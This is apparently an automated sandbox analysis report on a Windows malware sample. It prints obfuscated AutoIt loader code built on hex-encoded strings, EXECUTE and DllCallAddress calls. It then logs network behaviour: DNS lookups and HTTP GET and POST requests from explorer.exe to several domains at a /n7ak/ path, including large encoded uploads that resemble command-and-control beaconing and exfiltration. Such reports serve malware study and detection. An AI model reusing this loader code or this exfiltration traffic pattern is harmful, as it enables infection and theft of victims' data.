= 787260917 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1747070148 LOCAL $EAVVH = $A ($B (MTDUDAQCWRWM 
("317933353639373437423738373237373331333733313333323132343231323432363237323932303537323132313231353732313231323935353235323435343231323432313239323832363535353532353537353732383234323932353231323032313231323132313239323435323231323632393533323432393533323532343535323132373530323532313234323632373530323132333239323832353234353532393239353532353234353532393234323132343236323432363234323632393535323532343537353232343231323735303537353735373537323632343534323135373537323832343236323932313230323132313231323132393234353232313236323932383231323935333235323732323235323932383235323435373239323935333235323435353231323932383235323435353532323935333235323433331" ) ) ) $1931633093 = 1570807129 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1752174969 LOCAL $KNXCVJDL = $A ($B (MTDUDAQCWRWM ("317933353742363637333632374237383742363237323331333733313333323432383235353432353537353735373537323432313537353735353236323935353239323435333231353735353537353735373537323932323532323532313532323432313537353735353237323432383235323132343231323935353239323435333231353735353537353735373537323432313239353532393234323835323534323735373537353735373234323135373537353532363239353532393234323832353537353535373537353735373239323235323235323135323234323135373537353532373234323832353231323432313239353532393234323832353537353535373537353735373234323132393535323932343535353235373237353735373537353732343231353735373535323632393535323932343230323135373534353735373537353733331" ) ) ) $1931633093 = 421435348 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1762338784 LOCAL $OPKDPJAE = $A ($B (MTDUDAQCWRWM 
("307832343634364236373645364436313230323632303232343134333436343334363436343634363337333233363436333633333336333533363336343333373338333534323330343634333436343634363436333733333337333333383338333833353432333234363433343634363436343634333337333833353433333034363431343634363436343633343435333733343334333633373332343333373338333534333334343634313436343634363436333633353336333533353336333633393433333733383335343333383436343134363436343634363337333233373334333733353336333134333337333833353433343334363431343634363436343633363433333434343336333533363434343333373338333534343330343634313436343634363436333634363337333233373339333033303433333733383335333532320" ) ) ) $1931633093 = 615978281 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1766663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("66756D70662" ) , $Z56D5656Q , MTDUDAQCWRWM ("7275731" ) , EXECUTE (STRINGREVERSE (BINARYTOSTRING (MTDUDAQCWRWM ("337B3" ) & $GF6DF148745 ) ) ) , MTDUDAQCWRWM ("7175731" ) , DLLSTRUCTGETPTR ($I5U6G ) ) [0 ] $1931633093 = 536163955 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1814921641 LOCAL $EZEWZOW = $A ($B (MTDUDAQCWRWM ("317933353738363137303733363737353633373537383331333733313333323932343238323132313231323132313231323132393535323932343534353235373239353735373537353732343231353432393238323635343237353735373537353732393238323932343230323532313230323132313231323132393535323932343230323535373535353735373537353732343231353432393239323435343237353735373537353732393533323435353230323532393238323932343232323932313230323132313231323132393535323932343533323535373532353735373537353732343231353432393236323135343237353735373537353732393238323932343535323932313231323132313231323132393535323532343535323932343231323935333535353435343239323435373534323735373537353735373239323832393234323233331" ) ) ) $1931633093 = 689797956 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1815561647 LOCAL $AUTDBWXLC = $A ($B (MTDUDAQCWRWM 
("317933353639363536393740374736323331333733313333323032313231323132313234323832343231323935353239323532333235323935323231323032313231323132313234323732343231353735373238323532333235323732313231323032313231323132313239323235323235323135323232323235323231323932323537353332373235323635353233323832393230353435323236323932313230323132313231323132373530323435343234323832393533353735323537353732363234323135323239353532393235323332353231323532313232323132313231323132393535353332353233323532393532323132303231323132313231323432313537323235303234353432393532353735373532353735373537353732353232323932343532323132363235353532333234353732343534323435333239353333331" ) ) ) $1931633093 = 1584088969 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1844884533 LOCAL $BCCXEJY = $A ($B (MTDUDAQCWRWM ("3078323436353736373336443636363936383230323632303232333833353331343334363432343634363436343633363335333434353336333133363434333633363433333733383335333233303436343234363436343634363336333533343331333833383338333533323332343634323436343634363436343333373338333534343433343633393436343634363436333434353337333433353331333733353433333733383335343533303436333934363436343634363336333533373332333733393334333934333337333833353435333434363339343634363436343633363435333633363336343633373332343333373338333534353338343633393436343634363436333634343336333133373334333633393433333733383335343534333436333934363436343634363336343633363435333433363336333933363336343332320" ) ) ) $1931633093 = 1238590072 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1857967641 $1931633093 = 1174631798 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1859852671 LOCAL $UVILKQV = $A ($B (MTDUDAQCWRWM 
("30783234373536393639373737323230323632303232333033303338343433383335333034333436343634363436343634363335333034353338343333393435333734363436343634363338333933383335333134333330333133303330333033303338343433383335333233343436343434363436343634363335333034353338343233373435333734363436343634363338333933383335343133303330333033303330333033303338343433383335333434333436343234363436343634363335333034353338343133353435333734363436343634363338333933383335333834333330333033303330333033303338343433383335343333343436333934363436343634363335333034353338333933333435333734363436343634363338333933383335343633343330333033303330333033303338343433383335343432320" ) ) ) $1931633093 = 1125384096 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1871778911 $A ($B (MTDUDAQCWRWM ("317935353742374234323635363336343732363534323734363535353730363537303339333537383234363432373736334233313333323537373735363233333342333133353735363232353637363232393632363733381" ) ) ) $1931633093 = 1766663092 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1896016662 LOCAL $KKHCOLW = $A ($B (MTDUDAQCWRWM ("347C36303336333D33453332324632373331333D32353634363236343636373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373436364" ) ) ) $1931633093 = 1014003319 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1899827879 LOCAL $YWILF = $A ($B (MTDUDAQCWRWM 
("307832343631364637333733373436353230323632303232333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333032320" ) ) ) $1931633093 = 395587655 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1958988917 LOCAL $QGYECPWAM = $A ($B (MTDUDAQCWRWM ("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" ) ) ) $1931633093 = 909828637 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1972043913 LOCAL $YBRJY = $A ($B (MTDUDAQCWRWM ("31793335364037453740373937393743374737343331333733313333353232373234323932393239323432363231353735353537353735373537353232363239323432313235353735343537353735373537323535343236323532343236323632333532323632393234323132393537353435373537353735373237323832363235323732343235323735323236323932343231353235373534353735373537353732373238323735323237323432313231353232363239323435343532353732393537353735373537323432333236323532373532323532373532323632393234353732313537323935373537353735373237353732363233323735353237323035323236323932343537323535373239353735373537353732363235323532323236323432363233353232363239323435373239353732393537353735373537323632333237323433331" ) ) ) $1931633093 = 1129416656 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1974000802 LOCAL $LYIWMDQCC = $A ($B (MTDUDAQCWRWM 
("347C3630333D323633303241334532323634363236343636373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373436364" ) ) ) $1931633093 = 1575083007 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1988404486 LOCAL $EQNSJZVB = $A ($B (MTDUDAQCWRWM ("3078323436373741373836313730363436463230323632303232333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333032320" ) ) ) $1931633093 = 1262198596 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1991785796 LOCAL $ZEELGK = $A ($B (MTDUDAQCWRWM 
("337B31373545353134323431353235463133313531333131303137353730373537353735373537303034303B30363731303B373537363735373537353735303630303035303B303537353034303437303034303B303637313730373537363735373537353735303630343035303A30353736303530373035303537303034303B3036373030333735373637353735373537353035373530343034303B303B303B30363730303137353736373537353735373537303034303B3036373030373735373137353735373537353037303030343031303530363035303237303034303B30363730303B3735373137353735373537353034303730353036303630343035303A37303034303B3036373037303735373137353735373537353035373630353037303537353034303437303034303B3036373730333735373137353735373537353037303631313" ) ) ) $1931633093 = 776185208 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1993050705 LOCAL $QOVZH = $A ($B (MTDUDAQCWRWM ("3078323436433646363536453733373837353230323632303232333733383335333533343436343334363436343634363334343533373334333433353336343534333337333833353335333834363433343634363436343633373335333634343336333533373332343333373338333533353433343634333436343634363436333633313337333433363335333434323336333634333337333833353336333034363433343634363436343633363335333733393338333833383335333633323436343334363436343634363433333733343335333833343336343433363335333634343336333333363336343333373334333533383338333733303337333933383338333433353338343134333337333833353332333434363431343634363436343633343333333733323337333933373330343333373338333533323338343634313436343632320" ) ) ) $1931633093 = 812875559 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 1994269651 LOCAL $OBQRAN = $A ($B (MTDUDAQCWRWM ("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" ) ) ) $1931633093 = 1991785796 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2024172577 LOCAL $ZVFFBOYUU = $A ($B (MTDUDAQCWRWM 
("337B31373532354035463536353A3434313331353133313130343037373537303034303B3036303530333735373237353735373537353035303530363030303530363035303037303034303B303630353037373537323735373537353735303430373035303A3035373530353736303B303B303B30363035303B37353732373537353735373537303034303B3036303430373735373037353735373537353037373630343037303630313035303637303034303B30363034303B3735373037353735373537353034303030343036303537373035303637303034303B303630343730373537303735373537353735303630373035303B30343031303530363035303537303034303B3036303B30333735373037353735373537353035303230353037303B303B303B3036303B303137353730373537353735373537303034303B30363031303731313" ) ) ) $1931633093 = 1155583430 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2029313846 LOCAL $JDXKTSPDE = $A ($B (MTDUDAQCWRWM ("347C3630323C32403330323C333C323133303634363236343636373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373436364" ) ) ) $1931633093 = 714709978 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2044148400 LOCAL $IVGZPILLY = $A ($B (MTDUDAQCWRWM ("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" ) ) ) $1931633093 = 1493453038 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2051857597 LOCAL $DXXEMCRBD = $A ($B (MTDUDAQCWRWM 
("307832343643364236353734363837333632363236453230323632303232333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333032320" ) ) ) $1931633093 = 1629885481 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2069342920 LOCAL $UWMZARZX = $A ($B (MTDUDAQCWRWM ("337B313734313545343435413537353B3133313531333131303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303331313" ) ) ) $1931633093 = 864479061 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2079397349 LOCAL $IAYRSXUMG = $A ($B (MTDUDAQCWRWM 
("327A30363447343B3532343A353535353032303430323030313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313230302" ) ) ) $1931633093 = 1558516272 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 2087865545 LOCAL $IPABVDRDI = $A ($B (MTDUDAQCWRWM ("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" ) ) ) $1931633093 = 1814921641 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 ENDSWITCH UNTIL $AW1LULG3Q9 = 1135290 ENDFUNC FUNC KODZMEKGBG ($FDS1G1DEZE ) GLOBAL $353768791 = 66485247 GLOBAL $QBTCYTKZIB = 3958391 DO ISBINARY (MTDUDAQCWRWM ("414B69796F72524F53593468517530793643584A556169546B656B58486471314875466B333573524A574C4F334B3545724C4C68317A3041427A6F6A6833684F47634A75594F0" ) ) SWITCH $353768791 CASE 66485247 LOCAL $ZAA = EXECUTE (MTDUDAQCWRWM ("647964627475641" ) ) $353768791 = 1640164563 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 188325663 LOCAL $UY5QE2DGDG253 = $ZAA ($ZZ (MTDUDAQCWRWM ("3078343436433643353337343732373536333734343337323635363137343635323832323632373937343635323037333638363536433643363336463634363535423232323032363230343236393645363137323739344336353645323832343732374133313734373236383332333537323741363537323239323032363230323235443232324332303234364636383333363732390" ) ) ) $353768791 = 1363940638 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 461545339 LOCAL $RZ1TRH25RZER = MTDUDAQCWRWM ("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" ) $353768791 = 659661563 $QBTCYTKZIB = $QBTCYTKZIB + 1 CASE 498628477 DIM $ZAEPFPD5SDF = $ZAA ($ZZ (MTDUDAQCWRWM 

                                            Network Behavior

                                            Snort IDS Alerts

                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                            01/13/21-21:12:35.247969 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49745 | 34.102.136.180 | 192.168.2.3

                                            Network Port Distribution

                                            TCP Packets

                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                            UDP Packets

                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Jan 13, 2021 21:14:05.182780027 CET53571458.8.8.8192.168.2.3
                                            Jan 13, 2021 21:14:05.886885881 CET5535953192.168.2.38.8.8.8
                                            Jan 13, 2021 21:14:05.938894987 CET53553598.8.8.8192.168.2.3
                                            Jan 13, 2021 21:14:06.844403028 CET5830653192.168.2.38.8.8.8
                                            Jan 13, 2021 21:14:06.900784016 CET53583068.8.8.8192.168.2.3
                                            Jan 13, 2021 21:14:08.174479961 CET6412453192.168.2.38.8.8.8
                                            Jan 13, 2021 21:14:08.231090069 CET53641248.8.8.8192.168.2.3
                                            Jan 13, 2021 21:14:08.819364071 CET4936153192.168.2.38.8.8.8
                                            Jan 13, 2021 21:14:08.875713110 CET53493618.8.8.8192.168.2.3
                                            Jan 13, 2021 21:14:14.384748936 CET6315053192.168.2.38.8.8.8
                                            Jan 13, 2021 21:14:14.456562042 CET53631508.8.8.8192.168.2.3

                                            DNS Queries

                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                            Jan 13, 2021 21:12:34.989147902 CET | 192.168.2.3 | 8.8.8.8 | 0x8c2d | Standard query (0) | www.unbelievabowboutique.com | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:09.365077019 CET | 192.168.2.3 | 8.8.8.8 | 0xc258 | Standard query (0) | www.bepbosch.com | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:30.588669062 CET | 192.168.2.3 | 8.8.8.8 | 0xaa86 | Standard query (0) | www.huro14.com | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:32.665021896 CET | 192.168.2.3 | 8.8.8.8 | 0x7e5d | Standard query (0) | www.huro14.com | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:32.734510899 CET | 192.168.2.3 | 8.8.8.8 | 0x3480 | Standard query (0) | www.huro14.com | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:52.008276939 CET | 192.168.2.3 | 8.8.8.8 | 0xb1eb | Standard query (0) | www.wwwswty6655.com | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:54.094017029 CET | 192.168.2.3 | 8.8.8.8 | 0x316f | Standard query (0) | www.wwwswty6655.com | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:54.158955097 CET | 192.168.2.3 | 8.8.8.8 | 0xe030 | Standard query (0) | www.wwwswty6655.com | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:14:14.384748936 CET | 192.168.2.3 | 8.8.8.8 | 0xc278 | Standard query (0) | www.hydrabadproperties.com | A (IP address) | IN (0x0001)

                                            DNS Answers

                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                            Jan 13, 2021 21:12:35.062227011 CET | 8.8.8.8 | 192.168.2.3 | 0x8c2d | No error (0) | www.unbelievabowboutique.com | unbelievabowboutique.com | | CNAME (Canonical name) | IN (0x0001)
                                            Jan 13, 2021 21:12:35.062227011 CET | 8.8.8.8 | 192.168.2.3 | 0x8c2d | No error (0) | unbelievabowboutique.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:09.511540890 CET | 8.8.8.8 | 192.168.2.3 | 0xc258 | No error (0) | www.bepbosch.com | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
                                            Jan 13, 2021 21:13:09.511540890 CET | 8.8.8.8 | 192.168.2.3 | 0xc258 | No error (0) | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | | 3.223.115.185 | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:30.654230118 CET | 8.8.8.8 | 192.168.2.3 | 0xaa86 | Name error (3) | www.huro14.com | none | none | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:32.727684021 CET | 8.8.8.8 | 192.168.2.3 | 0x7e5d | Name error (3) | www.huro14.com | none | none | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:32.785713911 CET | 8.8.8.8 | 192.168.2.3 | 0x3480 | Name error (3) | www.huro14.com | none | none | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:52.079715967 CET | 8.8.8.8 | 192.168.2.3 | 0xb1eb | Name error (3) | www.wwwswty6655.com | none | none | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:54.150810957 CET | 8.8.8.8 | 192.168.2.3 | 0x316f | Name error (3) | www.wwwswty6655.com | none | none | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:13:54.215436935 CET | 8.8.8.8 | 192.168.2.3 | 0xe030 | Name error (3) | www.wwwswty6655.com | none | none | A (IP address) | IN (0x0001)
                                            Jan 13, 2021 21:14:14.456562042 CET | 8.8.8.8 | 192.168.2.3 | 0xc278 | No error (0) | www.hydrabadproperties.com | | 91.195.240.94 | A (IP address) | IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.unbelievabowboutique.com
                                            • www.bepbosch.com
                                            • www.hydrabadproperties.com

                                            HTTP Packets

                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            0 | 192.168.2.3 | 49745 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 13, 2021 21:12:35.109096050 CET | 8730 | OUT | GET /n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR HTTP/1.1
                                            Host: www.unbelievabowboutique.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:12:35.247968912 CET | 8731 | IN | HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 13 Jan 2021 20:12:35 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "5ffc83a1-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            1 | 192.168.2.3 | 49748 | 3.223.115.185 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 13, 2021 21:13:09.641056061 CET | 8749 | OUT | GET /n7ak/?rN=MxLeMLg7J3XdambF4+q7RpqtyYrbwIYxF5p89mR13ayzWNjROKSjcDea1OeFglLEscbA&QZ3=dhrxPpcXO0TLHVR HTTP/1.1
                                            Host: www.bepbosch.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:13:09.767514944 CET | 8749 | IN | HTTP/1.1 302 Found
                                            Cache-Control: private
                                            Content-Type: text/html; charset=utf-8
                                            Location: https://www.hugedomains.com/domain_profile.cfm?d=bepbosch&e=com
                                            Server: Microsoft-IIS/8.5
                                            X-Powered-By: ASP.NET
                                            Date: Wed, 13 Jan 2021 20:12:28 GMT
                                            Connection: close
                                            Content-Length: 184
                                            Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=bepbosch&amp;e=com">here</a>.</h2></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            2 | 192.168.2.3 | 49750 | 3.223.115.185 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 13, 2021 21:13:11.919610023 CET | 8759 | OUT | POST /n7ak/ HTTP/1.1
                                            Host: www.bepbosch.com
                                            Connection: close
                                            Content-Length: 408
                                            Cache-Control: no-cache
                                            Origin: http://www.bepbosch.com
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://www.bepbosch.com/n7ak/
                                            Accept-Language: en-US
                                            Accept-Encoding: gzip, deflate
                                            Data Ascii: rN=ETHkSuc-J1b_YhLInKTzOffK7NzP28Z3U5IY4EZU(b2zHfj7HYrwYjDCjeS4iUbksuey1yv7tFDcsWgIDPCsaPtJmNLa695t7DXv8px4mWCjXkQ29zCcfTO5ZJPZM9E25fUKCA~-h4TNQ2l67jh_yJyrFHPiTIjFKQz8qx8EhhFA3WZcKr0lHd6QWfX4rmL1TZu_HwxKETQ0SKHtbam734h0SH4j6Vg2atkC~P(ztv2-pzciyVd95wskdjJ8ZN2UNRo4dJ4ab6qUQfpbQKDRRMFlol~-6GLZj1(umQl8n-V_Ge1TiacndnVWv77R7hHaPXDHmZmq7oT5JZoG6NIhrP0UUmGdRsyIcQeNY-7gqGA_bNZ-EC7a(0N1rgK7NgTLtLgSTuzreoFuH-IXYw).
                                            Jan 13, 2021 21:13:12.046693087 CET | 8760 | IN | HTTP/1.1 302 Found
                                            Cache-Control: private
                                            Content-Type: text/html; charset=utf-8
                                            Location: https://www.hugedomains.com/domain_profile.cfm?d=bepbosch&e=com
                                            Server: Microsoft-IIS/8.5
                                            X-Powered-By: ASP.NET
                                            Date: Wed, 13 Jan 2021 20:12:30 GMT
                                            Connection: close
                                            Content-Length: 184
                                            Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=bepbosch&amp;e=com">here</a>.</h2></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            3 | 192.168.2.3 | 49751 | 3.223.115.185 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 13, 2021 21:13:12.050611019 CET | 8768 | OUT | POST /n7ak/ HTTP/1.1
                                            Host: www.bepbosch.com
                                            Connection: close
                                            Content-Length: 194340
                                            Cache-Control: no-cache
                                            Origin: http://www.bepbosch.com
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://www.bepbosch.com/n7ak/
                                            Accept-Language: en-US
                                            Accept-Encoding: gzip, deflate
                                            Jan 13, 2021 21:13:12.695915937 CET | 8955 | IN | HTTP/1.1 302 Found
                                            Cache-Control: private
                                            Content-Type: text/html; charset=utf-8
                                            Location: https://www.hugedomains.com/domain_profile.cfm?d=bepbosch&e=com
                                            Server: Microsoft-IIS/8.5
                                            X-Powered-By: ASP.NET
                                            Date: Wed, 13 Jan 2021 20:12:31 GMT
                                            Connection: close
                                            Content-Length: 184
                                            Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=bepbosch&amp;e=com">here</a>.</h2></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            4 | 192.168.2.3 | 49762 | 91.195.240.94 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 13, 2021 21:14:14.503000975 CET | 9815 | OUT | GET /n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&QZ3=dhrxPpcXO0TLHVR HTTP/1.1
                                            Host: www.hydrabadproperties.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:14:14.557537079 CET | 9816 | IN | HTTP/1.1 301 Moved Permanently
                                            content-type: text/html; charset=utf-8
                                            location: https://www.hydrabadproperties.com/n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&QZ3=dhrxPpcXO0TLHVR
                                            date: Wed, 13 Jan 2021 20:14:14 GMT
                                            content-length: 171
                                            connection: close
                                            Data Ascii: <a href="https://www.hydrabadproperties.com/n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&amp;QZ3=dhrxPpcXO0TLHVR">Moved Permanently</a>.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            5 | 192.168.2.3 | 49763 | 91.195.240.94 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 13, 2021 21:14:16.616647005 CET | 9817 | OUT | POST /n7ak/ HTTP/1.1
                                            Host: www.hydrabadproperties.com
                                            Connection: close
                                            Content-Length: 408
                                            Cache-Control: no-cache
                                            Origin: http://www.hydrabadproperties.com
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://www.hydrabadproperties.com/n7ak/
                                            Accept-Language: en-US
                                            Accept-Encoding: gzip, deflate
                                            Data Ascii: rN=IGMCEU4WxK0GGgX33Uew4Jv0jQeYIKkfJSFJxJzk1k88yMy8edHFMvYPCLR1o8fYS-ktlkiYdIBee3KvjciMxfX1CJnAZRfZJrQZNExJnr07OzfCT0XiS9ZwMYlvuh8CBJ0Ar7kaQKho6u(wbkrA(i8TqWzC448FNlDXGfi-nrbHJD8na9H0nEMfof4d~Dzc7GRTWv42NyYON0WYn7loN6pwfoRHhUDAM54DJNVjN7~jLdZe29uRWojgy6k1FjsPyaIadeerICkJvliYkuvD8mgeeqgWO0A6aTKn5evP(48DeHdaLGInAOPkPdov8P0hKtt62libLBWf7SBXpVmbifjCMwQZM2YQwrQtAVEs9P9eMKO_c_N7BaFPnNVJLly7Hpo0G4Lpi8qkIwNqqw).
                                            Jan 13, 2021 21:14:16.678611040 CET | 9831 | IN | HTTP/1.1 301 Moved Permanently
                                            location: https://www.hydrabadproperties.com/n7ak/
                                            date: Wed, 13 Jan 2021 20:14:16 GMT
                                            content-length: 0
                                            connection: close


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            6 | 192.168.2.3 | 49764 | 91.195.240.94 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 13, 2021 21:14:16.666001081 CET | 9831 | OUT | POST /n7ak/ HTTP/1.1
                                            Host: www.hydrabadproperties.com
                                            Connection: close
                                            Content-Length: 194340
